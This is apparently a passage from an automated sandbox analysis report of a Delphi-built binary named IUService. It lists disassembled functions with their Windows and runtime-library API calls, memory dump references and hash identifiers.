                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B18
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B52
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027B99,?,?,?,?), ref: 50027B71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiFromInternalStr$qqrr20StringStringx27System@%System@@T$us$i0$%$CharIndex$qqrx20NextStringiSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 112165042-0
                                                                                                                                            • Opcode ID: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                                                            • Instruction ID: 35ce13431533dfb919b24986911c6e13b21b563e3ea2f71161cf238d0aa8309e
                                                                                                                                            • Opcode Fuzzy Hash: 5ab0ca6b7efa682e0a8c0cf649096109340480c0a6d78f3667cd2438d1eb862a
                                                                                                                                            • Instruction Fuzzy Hash: BE21B631A0218AEFDF12DFA4EA417ADB7F5EF45310F6042A2D508A7151D3749E40DB90
                                                                                                                                            Function 500270C0 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50027182), ref: 50027108
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50027182), ref: 50027136
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50027182), ref: 50027145
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(00000000,50027182), ref: 50027154
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Exception@$bctr$qqrx20StringSysutils@Unicode$ClassClass$qqrp14LoadMetaObjectp17RecxiString$qqrp20Stringpx14System@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3708808660-0
                                                                                                                                            • Opcode ID: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                                                            • Instruction ID: 33e2ff48ece4c1c09eb1b0648f1bee825e15256ae891d4046b3df70333a380a6
                                                                                                                                            • Opcode Fuzzy Hash: 114fbacdc6cb7fb3462a26799a0944743581bf824f00dcc18a41d0bfae1d8de9
                                                                                                                                            • Instruction Fuzzy Hash: F72192346015469FDB10CFACED919ADB7F5FF49300F508666E508D73A5DA30AE04CB90
                                                                                                                                            Function 500059EC Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?,?,?,50005AE5), ref: 50005A13
                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000), ref: 50005A88
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 50005AA8
                                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 50005ABC
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(000000F5), ref: 50005AC1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Res$qqriSystem@$CreateErrorFileHandleLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2961129769-0
                                                                                                                                            • Opcode ID: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                                                            • Instruction ID: def1b6819490b2fa9b0a5e09cb0acd6702a6deccba95574e8a0b2e564d39748f
                                                                                                                                            • Opcode Fuzzy Hash: d63abc15d01510dc30b575c880705f7218f0e4a71d622e56fee6778df18cb518
                                                                                                                                            • Instruction Fuzzy Hash: B4113A61305281DAFB14DF58CCE079BA9959F87212FA4C356E5048F2E6E778CC40C397
                                                                                                                                            Function 500284FC Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028538
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 5002856B
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500285AC,?,?,?,?,5002872E,?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000), ref: 50028586
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteStringiSysutils@Type$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2787194164-0
                                                                                                                                            • Opcode ID: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                                                            • Instruction ID: f94e552c94311d6681ea6b9088efd7c55080737d05d2957480002ee94c899e9e
                                                                                                                                            • Opcode Fuzzy Hash: eec2c889b96c63f28c6d912a4f2a099ea762f16bceb9a5f7ed7734ac0c1a855f
                                                                                                                                            • Instruction Fuzzy Hash: 9C11BE38B03A96DBDF01DEB8EA825AEB3F9EF442407A086B5E500D3161E770EE01D750
                                                                                                                                            Function 50015A28 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015AB9), ref: 50015A64
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015AB9), ref: 50015A7B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,50015AB9), ref: 50015A93
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$AnsiFromStr$qqrr20StringStringx27System@%T$us$i0$%$InternalLength$qqrr20Move$qqrpxvpviStringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 986796861-0
                                                                                                                                            • Opcode ID: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                                                            • Instruction ID: 273e415b261a473a3476493ac361f3ac1f54f6cd7220035dc33fede40ddaa886
                                                                                                                                            • Opcode Fuzzy Hash: 10025f9b933ecd5712bc93f26f254c4d90db7b168fed868ef1a57108d806b3bb
                                                                                                                                            • Instruction Fuzzy Hash: F3110031740284DFEB04CBA9DDD29AAB3F9EF996007E4037AE904CB311EB70DE408691
                                                                                                                                            Function 500095F4 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(?,?,?), ref: 50009611
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?,?), ref: 5000964A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$CharClr$qqrpvFreeFromLen$qqrr17StringStringpbiSystem@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4035486651-0
                                                                                                                                            • Opcode ID: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                                                            • Instruction ID: f7e519a3914915a7ddd12a0a43312b4a76140a576ef5cdbbdeb6b3b112df9300
                                                                                                                                            • Opcode Fuzzy Hash: 58788c31a9392e6549bcfa84bf31123cf4ff7a055d905c796c92d66516e9aead
                                                                                                                                            • Instruction Fuzzy Hash: 9111CE31B0564957AB00DAA9D8E18CFB2DA9FA8210B944337BA04E3312DEB6DE4447D0
                                                                                                                                            Function 50027888 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027895
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278C2
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027920), ref: 500278EE
                                                                                                                                            • @Sysutils@ByteToCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027920), ref: 50027903
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50027927), ref: 5002791A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$ByteCharClr$qqrpvIndex$qqrx27Ref$qqrpvSysutils@T$us$i0$%i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4214602929-0
                                                                                                                                            • Opcode ID: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                                                            • Instruction ID: c3c75d1b48e19cc3e1f6b6390753f07d084fbfb0e8c4f9dbf7f6214b8e7eb97a
                                                                                                                                            • Opcode Fuzzy Hash: 5a3c4d89908cf0cf4437ecb80cfc5886c6d8491ff44f0f31cfd21df03d7b4b82
                                                                                                                                            • Instruction Fuzzy Hash: D511A030B01286EFAB05DFB8EB5697DB3F9EB482007A04275E508D3655EB70EE40D750
                                                                                                                                            Function 50027930 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027968
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50027992
                                                                                                                                            • @Sysutils@ByteToCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,500279C4,?,?,?,?,500279E1,50022AF3,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 500279A7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$ByteCharIndex$qqrx20StringiSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1663083771-0
                                                                                                                                            • Opcode ID: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                                                            • Instruction ID: aa1a79b2077093aec0dc215978b6579e0673518319e3e08c2949f697f48abfbb
                                                                                                                                            • Opcode Fuzzy Hash: 68e17aca844da68af2cac0459f8ec52d04a034524aca00c230a62bba0d0821d2
                                                                                                                                            • Instruction Fuzzy Hash: EC112E30701286DFAF01CFAAEA42969B7F9EB88200BA042B6E508D3655E770EE40D650
                                                                                                                                            Function 5000A164 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A1CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Unicode$Clr$qqrpvLength$qqrr20Move$qqrpxvpviStringStringi$AnsiAsg$qqrr20FreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr20String$qqriStringx20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 87712638-0
                                                                                                                                            • Opcode ID: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                                                            • Instruction ID: 79869a9546d8ae15c7d4563ffc226c392f69356ca43a144d6d3bba8582a221f3
                                                                                                                                            • Opcode Fuzzy Hash: b2517f3e29e0c2378a26b9be41a75c938c5ddf139d7f123da371e61d7ede2628
                                                                                                                                            • Instruction Fuzzy Hash: C901B5347435A14BFB18E649D471B6AB3F3AFD6210FE4C71AA6058B249DAB09C41C782
                                                                                                                                            Function 5001C048 Relevance: 7.6, APIs: 5, Instructions: 54timefileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 5001C059
                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 5001C062
                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileTime$Array$qqrr20DateErrorFindFromLastLocalNextStringpbiSystem@System@@Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2911837428-0
                                                                                                                                            • Opcode ID: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                                                            • Instruction ID: 5728537e3c39e6084da27139d89328dfbbaad40690f3e6d11adc8d77ec81f8e3
                                                                                                                                            • Opcode Fuzzy Hash: d772afcc146df195d284147fd921b47fd2c998ab065165d502e497404e87112c
                                                                                                                                            • Instruction Fuzzy Hash: D6115BB26041809FDB45DFA8D8C1C87B3ECAF8C21075586A2ED48DF24AE630D9508BA1
                                                                                                                                            Function 5001A744 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
